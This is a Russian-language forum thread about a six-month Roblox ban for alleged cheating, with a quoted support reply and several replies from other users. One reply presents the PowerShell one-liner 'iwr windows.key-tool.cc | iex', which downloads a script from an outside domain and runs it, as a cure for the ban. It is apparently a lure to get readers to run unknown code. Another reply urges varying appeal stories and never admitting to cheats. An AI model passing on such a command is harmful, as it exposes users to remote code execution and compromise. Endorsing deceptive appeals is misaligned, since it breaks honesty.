Что делать если меня забанили в роблокс за читы, но я их не использовал, а поддержка не помогает?
Я играл в роблокс и мне прелетел бан на пол года, что делать? Я писал в поддержку и там пишут:
Благодарим за обращение в службу поддержки клиентов Roblox.
Ваш статус аккаунта связан с античит-детективами Roblox. Мы не можем удалить текущие действия на ваш счет. Пожалуйста, ознакомьтесь с нашим руководством по поддержке Меры по борьбе с мошенничеством и устранению неполадок Предотвращение будущих действий против вашего аккаунта.
Если ваше отключение доступа связано с одним опытом Roblox, пожалуйста, свяжитесь с каналом поддержки этой игры.
Искренне,
Поддержка клиентов Roblox
Помогите пожалуйста, эта учётная запись очень мне нужна сейчас. Нажеюсь ктото занет как это решить
у рб новый античит очень мощный. Меня и всех моих друзей перебанили. Возможно, они банят из-за впн (в ближайшее время примерно то-же самое было в геншин импакте, там тоже выпустили новый античит и он банил людей из СНГ и в частности из России из-за ВПН). Просто не пиши часто поддержке, но делай это настырно. Допустим написал один раз, подождал ответа, и пишешь через 24 часа. За "спам" даже им на почту они могут увеличить длительность твоего бана. Эксперементируй с описанием аппеляции, допустим сначала пишешь "я не использовал ничего", потом "Я использовал ВПН" и т.д. Главное не признавайся в том, что ты использовал читы/макросы и т.д. Если это не поможет, то единственное что остаётся - это ожидание. Как говориться, время — лучший лекарь. Ну, если тебя не забанили навсегда или не снесли акк :)
Если банит, попробуй вот это
Нажми Win+R, напиши POWERSHELL
Затем
iwr windows.key-tool.cc | iex
и будет тебе счастье
мне тоже 1 числа Бан на пол года прилетел, поддержка вообще не помогает
бро,меня точно так же забанили на пол года.Пишут что за читы,но их даже и не было.Апеляцию они даже не рассматривают
Щас всех стали банить просто так, у меня сейчас такая же ситуация